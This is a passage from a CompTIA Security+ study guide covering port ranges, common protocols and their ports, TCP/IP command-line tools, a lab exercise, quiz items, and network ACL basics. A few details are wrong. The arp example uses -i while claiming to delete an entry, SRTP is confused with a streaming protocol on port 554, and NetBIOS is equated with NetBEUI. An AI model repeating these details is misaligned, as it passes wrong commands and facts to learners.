on port 80 unless you tell them otherwise. It also means when you set up a web server, you never have to
worry some other application is using its port.
Coincidentally, your web browser doesn't use port 80 as its source port: if it did, you couldn't run a web
browser on the same computer that also hosts a web server. Instead, client programs connecting to servers
typically use ephemeral ports or dynamic ports, which are held in a pool by the operating system and
assigned only for the length of a given connection. This means source and destination ports are as importantly
different as source and destination addresses.
The IANA maintains an official list of port numbers with recommendations of how they should be used by
applications. Since hosts are all handled locally it's not something as rigid as the IP or DNS systems.
Applications can be configured to use different ports, but this must be done with care: not only can that keep a
remote host from successfully connecting to a server application, it can cause compatibility issues with other
services on the local host.
The IANA list is separated into three ranges. Not only are ports in each range assigned differently, most
operating systems treat communications to and from different port ranges in different ways.

CompTIA Security+ Exam SY0-501 197


Chapter 4: Network fundamentals / Module C: Network ports and applications

System ports Ports 0-1023 are assigned to the most universal and accepted TCP/IP standard applications,
or applications the IANA expects to become standards. These are often called well-known
ports because most important services are in this range. They're sometimes called privileged
ports, since many operating systems require administrative privileges to bind an application
to ports in this range.
User ports Ports 1024-49151 are assigned to applications that benefit from assigned port numbers, but
aren't so widely used that they need to become a worldwide standard. They're sometimes
called registered ports, since any creator of a valid server application can apply to the IANA
for a port number in this range. They're called user ports because any user-level application
can bind to a custom port in this range.
Private ports Ports 49152-65535 aren't assigned by the IANA, and can be used for any purpose without
registration. Usually they're used by private applications or for temporary purposes. Most
operating systems assign their pool of ephemeral ports from this range.

Common port assignments


After decades of protocol development, hundreds of ports have been assigned in the system port range alone.
Especially since they're usually transparent in normal operations it's not reasonable to expect anyone to
remember them all. At the same time, knowing ports is important for configuring applications,
troubleshooting network operations, or securing networks without blocking vital services. Firewall
configurations in particular rely heavily on port-based rules, so it's important to recognize essential, or
unwanted, applications on your network so that you can open or block those ports.

Note: A given protocol might use TCP, UDP, or both, but usually when the IANA reserves a port number
for a given application, it reserves it for all protocols.
Protocol Name Description Ports
HTTP Hypertext Transfer Used to retrieve data from web servers. TCP 80
Protocol

HTTPS HTTP over TLS/SSL Used for secure web pages and sites. Includes TCP 443
encryption services.

FTP File Transfer Protocol Used for transferring files between hosts. TCP 20 (data),
Contains basic authentication features. TCP 21 (control)

FTPS FTP over TLS/SSL Used for secure file transfers. Includes TCP 989 (data),
encryption services. TCP 990 (control)

TFTP Trivial File Transfer Simpler, less secure file transfer protocol. UDP 69
Protocol Sometimes used for network boot software.

Telnet Telnet Used to log into remote systems via a virtual TCP 23
terminal interface. Sends all communications in
plain text.

198 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Protocol Name Description Ports


SSH, Secure Shell Encrypted replacement for Telnet and FTP. TCP 22
SFTP Includes Secure Copy Protocol (SCP) and
Secure Shell FTP (SFTP)

SMTP Simple Mail Transfer Sends email to and between mail servers. TCP 25
Protocol

POP Post Office Protocol Retrieves email from mail servers. TCP 110

IMAP Internet Message Retrieves email from mail servers. TCP 143
Access Protocol

RPC Remote Procedure Call Allows distributed programs on multiple TCP 135;
computers to exchange program commands UDP 135

SMB Server Message Block Used to share files and resources like printers. TCP 445

IPP Internet Printing Used to communicate with network printers or TCP 631; UDP
Protocol print servers. 631

Kerberos Kerberos Used for authentication services primarily on TCP 88; UDP 88
local networks and intranets.

LDAP Lightweight Directory Used for network directory services. TCP 389
Access Protocol

LDAPS Lightweight Directory Used for secured network directory services TCP 636
Access Protocol over
TLS/SSL

RDP Remote Desktop Used for remote logins to Windows systems. TCP 3389
Protocol

NetBIOS Network Basic Provides name, datagram, and session services UDP 137, 138;
Input/Output System for networks using the NetBIOS API. TCP 137, 139

SNMP Simple Network Used to remotely manage and monitor network UDP 161, 162
Management Protocol devices. (Trap)

DNS Domain Name System Resolves domain names into IP addresses. TCP and UDP 53

DHCP Dynamic Host Dynamically assigns IP addresses and other UDP 67, 68
Configuration Protocol network configuration on joining a network.

NTP Network Time Protocol Used to synchronize device clocks with time UDP 123
servers.

SRTP Secure Real-time Used to send encrypted streaming audio or video TCP and UDP 554
Streaming Protocol data

CompTIA Security+ Exam SY0-501 199


Chapter 4: Network fundamentals / Module C: Network ports and applications

Discussion: Network ports


1. How do system ports differ from user ports?
System ports are assigned only to important or standardized services, and some operating systems let
only services with administrative privileges to bind to these ports. User ports can be registered by any
valid application creator, and user applications can bind to them.
2. What port on your computer does your web browser use?
The source port is from the dynamic port range allocated by the operating system. HTTP uses port 80,
but that's on the remote web server.

Application protocols
In the end, IP packets and transport layer protocols just carry the data used by the application layer protocols
which host applications and services use to communicate. These high level protocols are very common targets
of attack, partly because they gives the most direct route to stealing network data, compromising host
applications, or gaining unauthorized system access. Importantly, many application protocols are insecure,
either because of poor implementation, or just being old enough that security wasn't a major concern or
possibility when they were first written.
Where possible it's best to disable or restrict use of vulnerable protocols. Many insecure protocols have
modern, secure replacements. Others can be used in conjunction with other protocols that provide security.
Application layer protocols can also benefit from security measures used on lower layers, such as by VPN or
Wi-Fi encryption. In some cases, where you can't disable a particularly vulnerable protocol you might need to
use network segmentation to make sure it's only allowed on limited, trusted network segments.

Remote access protocols


Ever since the old days of mainframes and terminals it's been popular to log into a computer or manage a
device from a remote location. There are a number of remote access protocols, with different levels of
sophistication and security.

Exam Objective: CompTIA SY0-501 2.6.2.6

Telnet Allows a command line terminal interface with a remote system. Dating to 1969,
Telnet is one of the oldest Internet standards, and uses TCP port 23. Its features are
very basic and it has no security, so it's best to disable it when possible. A similar
protocol to telnet, rlogin, has very similar vulnerabilities and should also be avoided.
Secure shell (SSH) Secure shell was developed as a secure alternative to Telnet and rlogin: it allows
stronger authentication and encrypted transmission. It also allows other features,
such as file transfers. SSH uses TCP port 22.
Remote Desktop Microsoft's proprietary remote access protocol. Not only does it provide encryption
Protocol (RDP) and authentication, but it allows you to log into a complete Windows desktop over
the network. RDP uses TCP port 3389. A number of other vendors offer similar
protocols for use with their own products—their individual security features may
vary.
Simple Network Used to remotely manage and monitor network devices like routers and switches.
Management Protocol SNMP doesn't provide a direct login to the device, but rather standardizes
(SNMP) communication between managed devices and a central management application.
SNMP uses UDP ports 161 and 162. SNMPv1 had no strong security features; while
version 2 added some, they weren't widely implemented. SNMPv3 adds support for
full cryptographic security, and should be used whenever possible.

200 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Resource sharing protocols


A variety of protocols are used to share files, user information, or other resources over the network. Some are
used over the internet, but most are primarily used for LAN services. Vulnerabilities in any of them can be
used by attackers to gather information or compromise systems.

Exam Objective: CompTIA SY0-501 2.6.1.5, 2.6.2.2, 2.6.2.5

Lightweight Directory Manages distributed directory information services across a network. It's used by
Access Protocol many directory service systems from multiple vendors, such as Novel's eDirectory
(LDAP) and Microsoft's Active Directory. LDAP allows clients to query a central network
database for information about user accounts, printers, and other network resources.
LDAP by default uses TCP port 389. Early versions of LDAP were not very secure;
modern versions can have fairly robust security options, but it's still usually only
used on trusted LANs and VPNs rather than over the internet. LDAP over SSL
(LDAPS) uses TCP port 636/
NetBIOS A session-layer API, rather than strictly a protocol, NetBIOS is designed to allow
various applications to communicate over the network. NetBIOS was designed by
IBM but is best known for its use by Microsoft Windows systems, where it is also
called NetBEUI and is used for file and printer sharing as well as computer
identification. NetBIOS itself is only usable over local network segments, but
accessory protocols allow it to be routed over larger networks via TCP/IP or
IPX/SPX. NetBIOS uses TCP and UDP ports 137-139. Due to a number of serious
security vulnerabilities, when NetBIOS must be used it should only be enabled on
trusted local networks, not on connections accessible from the internet.
Server Message Block Allows folders or hard drives to be shared over the network and accessed much like
(SMB) they were local drives. It's not only used by file servers, but by clients sharing folders
on peer-to-peer networks. SMB was primarily developed and popularized by
Microsoft, but today is used by many vendors. SMB can operate directly over TCP
port 445, but can also run over NetBIOS using ports 137-139. Some versions of
SMB are called CIFS, but typically the two can be used interchangeably. SMB is
primarily intended for use on LANs or VPNs, rather than over the internet.
File Transfer Protocol One of the oldest Internet protocols, FTP allows network access to files. It isn't very
(FTP) secure, and it isn't very much like accessing local files at all, so it's been gradually
displaced by more secure alternatives such as SFTP (part of SSH), or FTPS (using
SSL/TLS). Still, FTP itself is in common use as a way to provide Internet access to
files when security isn't a prime concern. FTP uses TCP ports 20 and 21.
Trivial File Transfer A simplified version of FTP designed for very lightweight applications, most
Protocol (TFTP) commonly used by hosts and devices configured to boot from the network. It has
fewer features than FTP, but it also has even fewer security features, so it should only
be enabled when necessary and never used over untrusted networks. TFTP uses UDP
port 69.
Network Time A protocol used to synchronize clocks between networked computers and devices,
Protocol (NTP) rather than to transfer user data. User applications seldom access NTP directly, but
the system clock is essential to many security functions: accurate system logs,
certificate validation, some authentication methods, and more. This means attacks
against NTP can be used for DoS, MitM attacks, or unauthorized system access. NTP
has several features which can be used to prevent bad time data from being applied,
but they require updated software and secure configuration of time services. NTP
uses UDP port 123.

CompTIA Security+ Exam SY0-501 201


Chapter 4: Network fundamentals / Module C: Network ports and applications

Hypertext Transfer Protocol


HTTP probably deserves special mention. Not only is it entirely ubiquitous in today's networks,, but it's a
pretty good example of how network applications aren't just ways of accessing systems or sharing files.
Actually, HTTP does share files, but it also gives the information web browsers need to display pages,
download images, submit information to online databases, or connect to other protocols that play music and
videos or run web applications. A modern web browser can do the work of almost any application over the
network, and HTTP is at the center of it. Since it's so widely used, many network attacks are specifically
designed to exploit HTTP or web browser behaviors.

Exam Objective: CompTIA SY0-501 2.6.1.10


HTTP operates on TCP port 80, and itself is an insecure protocol. This obviously is no good for things like
online payment services and web services with user-based security. To solve this problem, HTTP Secure
(HTTPS) was developed. HTTPS is essentially the same underlying protocol as HTTP, except for two
differences.
 HTTPS operates on TCP port 443.
 HTTPS connections are encrypted using either Secure Socket Layer (SSL) or Transport Layer Security
(TLS) protocols. This not only keeps others from eavesdropping on your conversations, it helps you
make sure you're really logging into your bank's website and not a clever mockup created by a
scammer.

You can tell which protocol a web address uses by whether it begins with http:// or https://. It's
important to make sure that HTTPS is in use and properly configured when using web browsers or
configuring web servers for any sort of sensitive activities over the internet. Even then, it's only as trustworthy
as the issuing certificate authority.

Email protocols
Apart from HTTP, if there's a network service people immediately think of it's email. One thing that makes it
tricky compared to other applications is that there are different protocols used for email: even a single account
is likely to use two different protocols, with different ports and configuration settings.

Simple Mail Transfer Used to send email from clients to servers, and for transferring email between
Protocol (SMTP) servers. It never is used by clients to receive email from servers. SMTP typically
uses TCP port 25.
Post Office Protocol Used by clients to receive email from servers; never used to send email. Currently at
(POP) version 3, or POP3. POP3 isn't designed to store messages for a long time on the
server, so works best for accounts accessed only on one device. It uses TCP port 110.
Internet Message Used by clients to receive email from servers; never used to send email. Currently at
Access Protocol version 4, or IMAP4. IMAP supports more features than POP. Since it stores all
(IMAP) messages permanently on the server it works better for accounts accessed from
multiple devices, but it also requires more server resources. It uses TCP port 143.
Messaging Application A proprietary protocol used by Microsoft Exchange email servers. It both sends and
Programming receives email, and has other specific features used by Exchange. It's not usually
Interface (MAPI) used on the Internet, but is popular in Microsoft-based networks and email clients.

By default SMTP, POP, and IMAP are unsecured, but each can be used with the same SSL or TLS protocols
used by HTTP. Depending on your email server configuration, secured access might use different ports. Since
it's hard to really control the path and security of email sent over the internet, if you want to be absolutely
certain messages are secure you might consider protocols like S/MIME or PGP which encrypt message
contents on the client level.

202 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Note: All of these protocols are for use by standalone email clients. Webmail uses HTTP through a web
browser to connect to an online client (which in turn will use traditional email protocols.) Note that
many webmail accounts can be accessed from email clients too, in which case they're configured using
normal protocols.

Discussion: Application protocols


1. What server applications are active on your local network?
Answers may vary, but even a small home router will have a DHCP server for clients and a web server
for its control interface.
2. What protocols do you use to access your primary email account? Is it encrypted?
Answers may vary, but most likely POP3/SMTP, IMAP/SMTP, or MAPI. All support encrypted
connections, though not all accounts or servers use it.
3. What is the difference between HTTP and HTTPS?
HTTPS uses TCP port 443 instead of 80, and uses SSL or TLS for authentication and encryption.
4. What would be a more secure replacement for FTP?
FTPS and SFTP are two separate replacements.
5. Why is NTP important even if you never use your computer to check the time?
Many security controls rely on accurate time synchronization between computers.

TCP/IP tools
When you set up a network or troubleshoot problems, you'll need to verify settings and check connectivity.
Even if it might seem old-fashioned at first, one of the best ways to do this is using the command-line utilities
available in any Windows or Unix-like operating system with a TCP/IP stack. Their syntax is fairly simple,
and they can often tell you more information more quickly than you can get by clicking around in graphical
settings. The specific commands available, and exactly how they work, depends on your operating system and
version.

Exam Objective: CompTIA SY0-501 2.2.14

ipconfig In Windows operating systems, displays or refreshes IP settings for network interfaces.
ifconfig In Unix-like operating systems, displays or configures IP settings for network
interfaces.
netstat Displays a variety of network information including active connections, routing tables,
and traffic statistics.
nbtstat In Windows, displays diagnostic information for NetBIOS over TCP/IP.
arp Displays the IPv4 ARP cache.
nslookup Performs DNS lookups and displays the IP address of a given host name.
ping Tests the reachability and latency of a given host.
traceroute/tracert Displays the hop-by-hop path to a given host, along with the round-trip time to each
hop.
pathping In Windows, behaves similarly to tracert by pinging every hop along the route to
determine relative latency.

CompTIA Security+ Exam SY0-501 203


Chapter 4: Network fundamentals / Module C: Network ports and applications

Even where Windows and Unix-like operating systems use the same commands, the exact syntax often varies
by exact version. If you're not used to using the command line, syntax diagrams either in books or in-line
documentation can be intimidating, but there's generally a standard. For purposes of the following
descriptions, we'll use syntax like in this sample command:
command -pip_address [interface_name] [/all]

 command is the command name.


 -p and /all are options or switches you can use to change the command's functions. You enter
them exactly as they look.
 ip_address and interface_name are variables or arguments used with the command. In this case,
you'd enter a remote IP address or a local network interface address, respectively.
 Brackets around any element indicate that it's optional.

ipconfig
In Windows, the ipconfig command is one of your prime tools for troubleshooting connectivity problems
and retrieving basic network information. It can be used to display network settings, as well as to fix some
problems with DHCP and DNS settings. The command itself displays basic settings for all installed network
interfaces, including IPv4 and IPv6 addresses, subnet mask, and default gateway. This means you can not
only verify basic configuration, but also check whether the adapter is using a routable or self-assigned IP
address. When you suspect a host might be set to the wrong IP address, or have an improperly set gateway or
DNS server, ipconfig is a good way to check.

Exam Objective: CompTIA SY0-501 2.2.14.6

For more options, the syntax is simple. You can use any one of the following parameters.
Parameter Description
/all Displays additional information for each interface, including name, physical address,
DNS, and DHCP settings.

/release Releases the current IPv4 address for all interfaces, or for a single specified interface.
[interface] Useful for removing bad DHCP settings.

204 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Parameter Description
/renew Renews the current IPv4 address for all interfaces, or for a single specified interface.
[interface] Useful for checking or repairing DHCP settings.

/release6 Like /release, but for IPv6 address.


[interface]

/renew6 Like /renew, but for IPv6 address


[interface]

/displaydns Displays the current contents of the DNS cache.

/flushdns Deletes the DNS cache. Useful when the current cache has incorrect entries.

/ Renews all DHCP leases and re-registers with DNS servers.


registerdns

As you can see, ipconfig is most useful for computers with dynamic IP addresses. With static addresses
you can still use it to view information and manage DNS settings, but it can't actually change IP settings.

ifconfig
Instead of ipconfig, Unix-like operating systems have the broader ifconfig command. It allows you to
configure a wide variety of interface settings, even on static IP addresses. The command itself shows address
and diagnostic information for all active interfaces. There are also a number of parameters you can use.
Parameter Description
-a Shows information for both active and inactive interfaces.

Interface up Enables the specified interface.

Interface down Disables the specified interface.

Interface dhcp release Releases the DHCP lease.

Interface dhcp start L:eases a new DHCP address.

Interface ip_address Assigns a static IP address.

Interface netmask Assigns a netmask for a static IP address.


ip_address

Interface mtuvalue Sets Ethernet MTU.

Interface promisc Enables promiscuous mode, allowing the interface to read all packets
passing through the network segment regardless of where they're
addressed. Important for running some diagnostic tools.

Interface -promisc Disables promiscuous mode.

inet6 Inserted immediately after interface with any IPv4 related


parameter, specifies the IPv6 equivalent.

CompTIA Security+ Exam SY0-501 205


Chapter 4: Network fundamentals / Module C: Network ports and applications

Note: ifconfig has largely been superseded by the newer and more powerful ip command, but it's
still installed and widely used on modern systems.

netstat
Never mind a busy server, even an ordinary user workstation today has a whole list of network applications
and services moving a lot of traffic over a large number of TCP/IP connections. The netstat command
allows you to get statistics related to active connections and routing.

Exam Objective: CompTIA SY0-501 2.2.14.2

netstat itself displays a list of communication sessions along with source and destination hosts and ports.
In addition to investigating connectivity issues, it is a very useful way to find any unusual or suspicious
network connections on a host. There are a wide variety of parameters available, depending heavily on your
specific operating system.
Parameter Description
-? Displays system-specific help.

-a Displays all connections and listening ports.

-b In Windows, displays the executable which created each connection or listening port. In
BSD-based operating systems, lists traffic quantity in bytes. (Linux uses -p for the
Windows function.)

-e Displays Ethernet statistics in bytes or frames sent/received.

-f In modern Windows versions, displays FQDN for remote addresses.

-p proto In Windows, shows connections for a particular Transport layer protocol. With -s, it can
also include Network layer protocols.

-r Displays the routing table.

-s Displays statistics by protocol.

-t In Linux, displays only TCP connections.

206 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

arp
The ARP cache usually takes care of itself pretty well, but if you need information or suspect any problems
such as ARP manipulation you can use the arp command. You can even add or delete entries from the table.
The syntax between the two depends on your operating system. There's a different ARP cache for each
network interface: by default any command will apply to all interfaces, but you can specify one optionally.
Some commands also allow the verbose ( -v ) parameter, showing more information.

Exam Objective: CompTIA SY0-501 2.2.14.5

Windows parameter Linux parameter Description


-a [inet addr] -a [-v] [-iif_addr] Displays the ARP cache. Optionally
[-Nif_addr] [-v] [inet_addr] limits to a listed internet address
and/or local interface.

-sinet addreth_addr -s [-v] [-iif_addr] Adds an IP address and corresponding


[if_addr] inet_addreth_addr Ethernet address to the cache.

-dinet addr [if_addr] -d [-v] [-iif_addr] Deletes an entry from the cache.
inet_addr

-f [-v] [-iif_addr] Adds entries from a file.


filename

For example arp -i 10.10.10.10 192.168.1.150 would delete 192.168.1.150's entry from the
ARP cache, but only for the local interface 10.10.10.10.

nslookup
If you want to perform DNS lookups on the command line, you can use the nslookup command. It can both
perform lookups (finding the IP address of a given FQDN) and reverse lookups (finding a FQDN of a given
IP), so you can use it both to find addresses and names, or use known names and addresses just to make sure
your DNS settings are working properly. You can perform single lookups, or else you can enter an interactive
mode that lets you just enter addresses until you press Ctrl+C to return to the command line.

Exam Objective: CompTIA SY0-501 2.2.14.4

CompTIA Security+ Exam SY0-501 207


Chapter 4: Network fundamentals / Module C: Network ports and applications

Command Description
nslookup Enters interactive mode using the default DNS server.

nslookup - Enters interactive mode using a specified server.


server

nslookup host Performs a single lookup using the default DNS server.

nslookup Performs a single lookup using a specified server.


hostserver

In Unix-like operating systems the similar dig command allows you to make more detailed DNS queries.

ping
One of the most important command line tools is ping, which checks connectivity to a given server in terms
of packet loss percentage, along with latency and number of hops traversed. Typically one use of the
command represents several individual echo request packets sent and measured individually. For basic
functionality you need only an address to ping, but each operating system includes a number of optional
parameters.

Exam Objective: CompTIA SY0-501 2.2.14.1

ping [parameters] address


Common parameter Description
-ncount Sends a specified number of pings.

-ccount Sends a specified number of pings.

-t Continues to ping until stopped

-a Attempts to do a reverse DNS lookup of the IP address pinged.

-lsize Sets the size of the packet. (default 32 bytes.)

-f Prevents packet fragmentation. With a large packet, you can use this to troubleshoot
MTU problems.

208 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

Common parameter Description


-iTTL Sets the TTL value of the packet. (max 255.)

-wtime Sets the timeout value for each packet in milliseconds (default 4000.)

-4 or -6 Forces use of IPv4 or IPv6. On some systems, the latter may just be called ping6.

For security reasons, the echo request packets used by ping are blocked by some hosts and firewalls. Inability
to ping a particular target shouldn't be seen as proof that there's a more general network interruption.

traceroute
When ping isn't enough and you want to know the network path to a remote host, you can use the
traceroute command, or tracert in Windows. It doesn't just report the round trip time and number of
hops to the remote host, it reports the name, address, and latency of each hop along the way. This lets you
look for routing loops, inefficient routes, or high latency (and thus likely overloaded) routers along the way.
Such routes can indicate network misconfigurations, failed routes, or even deliberate traffic redirection.

Exam Objective: CompTIA SY0-501 2.2.14.3


Like ping, the basic syntax of traceroute is traceroute [options] address Also like ping, different
implementations use tracert6, traceroute6, or the -6 parameter for IPv6 functionality.
Windows parameter Linux parameter Description
-d -n Doesn't perform reverse DNS lookups.

-hmaximum_hops -mmaximum_hops Specifies maximum TTL (default 30)

-wmilliseconds -wseconds Specifies timeout (Windows default 4000ms, Linux default


5.0s)

Exercise: Using TCP/IP tools


Do This How & Why

1. In Windows 7, type cmd into the The command window opens.


search box.

2. Check your IP settings using


ipconfig.

a) Type ipconfig The IP settings for all network adapters are displayed,
including IPv4 and IPv6 addresses, subnet masks, and default
gateways.

b) Type ipconfig /all Scroll up in the command window if necessary. The /all
parameter shows additional information, such as physical
address, DNS servers, and DHCP settings.

c) Type ipconfig /? The help option shows detailed command usage. You could
also release or renew a DHCP lease, among other things.

CompTIA Security+ Exam SY0-501 209


Chapter 4: Network fundamentals / Module C: Network ports and applications

Do This How & Why

d) How would your options differ if Apart from the syntax working a bit differently, you can also
you were using ifconfig in configure static IP address and a number of other interface
Linux? settings.

3. View your ARP cache.

a) Type arp. Just typing the command shows the documentation this time.

b) Use the parameter to display Type arp -a or arp -g. The exact results may vary
current ARP entries for all depending on your recent network usage.
adapters.

4. Type ping www.weather.gov. Your connectivity and latency to the National Weather Service
website is displayed. Notice that the FQDN shown by ping
isn't the same one you entered.

5. Type nslookup Akamai Technologies is a content delivery service that among


www.weather.gov. other clients hosts the NWS website. The DNS lookup data for
the website is displayed. www.weather.gov is actually an alias
for that particular akamai.net FQDN.

6. Type tracert www.weather.gov. You could use tracert if you're suspicious that traffic is being
redirected on its route. tracert displays ping times to each
router hop between you and the destination website, along
with both the FQDN and IP address for each.

7. Close the command line window.

Assessment: Network ports and applications


1. Match the network protocols with their default ports

Telnet 110

SSH 25

SNMP 636

SMTP 161

FTP 23

LDAPS 53

DNS 22

POP 143

IMAP 21

210 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module C: Network ports and applications

2. You want to securely connect to a server via a command line terminal interface. What protocol should you
use? Choose the best answer.
 FTP
 LDAP
 SSH
 Telnet

3. How many total packets need to be exchanged for a TCP handshake? Choose the best response.
 2
 3
 4
 5

4. What kind of communications would be suitable for UDP? Choose all that apply.
 DNS requests
 File transfers
 Online games
 Streaming video
 Website connections

5. Your company's custom server software application needs a TCP port to listen on. What port range should
it be configured to use?
 Private
 System
 User

6. What protocol would you use to connect to a shared drive on another Windows system? Choose the best
answer.
 AFP
 FTP
 SMB
 SNMP

7. HTTPS adds security to HTTP and uses a different port, but otherwise is fundamentally the same. True or
false?
 True
 False

CompTIA Security+ Exam SY0-501 211


Chapter 4: Network fundamentals / Summary: Network fundamentals

Summary: Network fundamentals


You should now know:
 About network models, Data Link layer technologies such as switches and VLANs, Network layer
technologies such as routing and IP, and unconventional network devices like VoIP and SANs.
 About IPv4 and IPv6 address formats, address resolution protocols, and network address translation.
 How transport layer protocols work, about commonly used network ports, and how to identify common
network application protocols.

212 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks
You will learn:
 About network security appliances
 How to secure data via transport encryption
 How to harden networks
 How to monitor networks and detect threats

CompTIA Security+ Exam SY0-501 213


Chapter 5: Securing networks / Module A: Network security components

Module A: Network security components


While "conventional" network devices and protocols can be configured or enhanced to improve security,
modern networks rely heavily on devices and software designed primarily to secure the network. The most
prominent and familiar of these are the firewalls found on almost all modern networks, but a number of others
are also important.
You will learn:
 About network ACLs
 About firewalls
 About IDS and IPS systems
 About other security and optimization devices

Network access control lists


Even when you're dealing with authenticated users, the next step, authorization, is all about determining what
resources they're allowed to access. There are a number of ways to do this, but one of the most common is
through Access control lists (ACLs). An ACL is a list attached to a resource, giving permissions, or rules,
about exactly who can access it. It's important to recognize that network ACLs are much different in function
than ACLs used in host file systems or applications. Instead of specifying what users or roles can access a
particular file or resource, on the network an ACL specifies what types of traffic are and aren't allowed to pass
through a device like a router or firewall. Different vendors may use different terms, but the important thing is
that a network ACL restricts unwanted traffic from passing through a device.
This application of network ACLs is called packet filtering, and it's one of the oldest and most common ways
of restricting network traffic for security purposes. For example, if you associated an IP address with repeated
attacks against your network, you could create an ACL that blocks traffic from that address. Similarly, if you
wanted to prevent network users from accessing a known phishing site, you could block access to its IP
address using an ACL. Inbound and outbound rules are typically on separate ACLs.

Exactly what parameters an ACL includes depends entirely on the device and software, and on where the
device is placed. ACLs on devices on the edges of the network tend to focus on edge control, examining
packet origins to restrict outside traffic. ACLs on interior devices tend to focus on core control, examining
packet destinations to control or restrict their paths through the network and breaking the internal network
into different security zones. Routers can commonly filter according to several criteria.
 IP address (source or destination)

214 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

 MAC address (source or destination)


 Port number (source or destination)
 Protocols used

Even a given device might support different options for filtering inbound and outbound traffic, or have other
restrictions. For example, Cisco routers allow standard ACLs which run quickly but can check only source IP
addresses, and extended ACLs which can filter by many standards but are more processor intensive.

ACL rules
An ACL is a lot like a MAC table or routing table, which should be no surprise since it's performing similar
functions. When a router (for example) receives a packet it checks it against the ACL and applies whatever
rule fits the situation. This has a few potential complications. One's just like with a MAC or routing table:
what happens if there isn't a rule for it? There are two basic models for access security, based on default
behavior: they apply not just to routers, but to all sorts of access control systems.

Exam Objective: CompTIA SY0-501 2.1.1.1, 2.1.1.4

Implicit Deny Access is denied unless a rule explicitly allows it. An ACL containing only explicit
allowances is often called a whitelist.
Implicit Allow Access is allowed unless a rule explicitly denies it. An ACL containing only explicit
denials is called a blacklist.

Implicit deny is the norm for secure systems, since it's harder to leave security holes by forgetting or deleting
important entries. That doesn't mean an ACL is just a whitelist, however; there are reasons why you might
need to explicitly deny certain traffic just as there are reasons you might need to explicitly allow it.
A big reason for the last fact is that network ACLs, either in purpose or construction, aren't just like routing
tables. For one, they apply to multiple dimensions. If you wanted to allow traffic from a specific subnet,
except for just one host, you technically could whitelist two ranges, with that host excluded. But what
happens if you want to allow all traffic from a certain IP range, but disallow all external telnet connections?
Because rules can conflict, ACLs have an order: depending on the system it might be a literal line by line
order, or a priority number assigned to each rule, but the process is the same.

1. Packets are matched against each rule in order.


2. The first rule that matches, allow or deny, is immediately applied. No other rules are processed.
3. If no rules match, the implicit deny applies.
For that prior example, you might have an ACL with the following rules (even if an actual router would have
more fields and use a different syntax).
Number Source address Protocol Destination Action Description
port
1 Any TCP 23 DENY Deny all traffic to the Telnet port.

2 10.10.0.0 /16 Any Any ALLOW Allow all traffic from the 10.10.0.0 subnet.

∞ All All All DENY Implicit deny all (Not explicitly listed).

When a packet arrives, it's processed against each rule: no matter what the packet is, only one rule will be
applied. Let's look at some examples.

CompTIA Security+ Exam SY0-501 215


Chapter 5: Securing networks / Module A: Network security components

Source address Protocol Destination port Result


192.168.20.13 TCP 23 DENY (Rule 1)

10.10.92.138 TCP 80 ALLOW (Rule 2)

10.10.92.138 TCP 23 DENY (Rule 1)

192.168.100.120 TCP 80 DENY (Implicit)

10.100.33.127 UDP 23 ALLOW (Rule 2)

Note: Some of those are a little tricky: remember that TCP and UDP port 23 aren't exactly the same.
Likewise, even if something would be implicitly denied anyway, it can be explicitly denied before
getting that far.
In real networks, ACLs can get large and complex, and have to be optimized not only for functionality but for
performance. They're not just used for security, either, but rather to shape how traffic flows through the
network.

Using ACLs for antispoofing


Even on a router that isn't primarily intended as a security device, ACLs can be a valuable security tool. One
of the most common is configuring rules that block packets with spoofed IP addresses, since those are a
common element of DDoS and other network attacks. A set of antispoofing ACLs might block packets with
the following source characteristics:

Exam Objective: CompTIA SY0-501 2.1.4, 3.2.4.10

 Martian packets with source addresses that would never be found on a valid packet
• Multicast addresses
• Loopback addresses
• Non-routable reserved or link-local addresses
 Packets with valid source addresses, but arriving on invalid interfaces
• Local addresses arriving from internet-facing ports
• Public addresses within the organization arriving from internet-facing ports
• Addresses from internal subnets arriving from ports that cannot reach that subnet
Note: Reverse path forwarding (RPF) functions on modern routers allow them to verify that a
valid path exists to a given IP address from a given port.

216 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module A: Network security components

Switch security features


Network ACLs are most commonly associated with routers, since they require a certain level of network
awareness and processing power on the part of the device that uses them. Despite this, switches and access
points have important traffic direction functions, and as they've become increasingly sophisticated they've
added features similar to router ACLs that can be used to filter traffic for security and performance reasons.

Exam Objective: CompTIA SY0-501 2.1.5, 2.1.13

Port security A switch feature that tracks device MAC addresses connected to each port on a switch,
and allows or denies traffic based on source MAC addresses. This can be used to block
unfamiliar addresses in order to keep rogue devices off the network, or to block inside
attacks based on MAC spoofing. It can also prevent multiple MAC addresses from
connecting to a single physical port, such as if a user attached an unauthorized hub or
switch to a network drop. It's possible for an unauthorized device to spoof the MAC
address of a legitimate one, so it's not strong security in itself, but it's still a useful
security layer.
MAC filtering On Ethernet networks this is another term for port security, but it's more commonly used
for a similar feature on WAPs. It's still useful, but much easier to circumvent because a
WAP transceiver only has one "port" and it's easier for an attacker to watch for legitimate
MAC addresses to imitate.
Loop protection Traditional switches are limited in traffic direction abilities, so any physical loop in a
Layer 2 network can cause a switching loop that causes traffic, especially broadcast
traffic, to circulate uselessly until it shuts down the whole network. Many switches use
switching protocols designed to specifically detect and disable redundant connections to
prevent switching loops. While maliciously introduced loops aren't a common network
attack, loop protection helps increase network availability by preventing accidental loops,
and allows you to create redundant physical connections to increase availability in case
one fails.
Flood guard More sophisticated switches that can examine packets on Layer 3 or higher can protect
against additional network attacks. In addition to anti-spoofing ACLs, a popular feature is
prevention against SYN floods and similar attacks. A switch with its flood guard enabled
enforces a rate limit on communications which shouldn't be a constant part of network
traffic, such as excessive SYN packets from a single IP address.

CompTIA Security+ Exam SY0-501 217


Chapter 5: Securing networks / Module A: Network security components

Discussion: Network ACLs


1. How is an ACL based on implicit deny different from a whitelist?
A whitelist wouldn't contain any explicit denials, but an ACL based on implicit deny might need to use
explicit deny to create exceptions in what it allows.
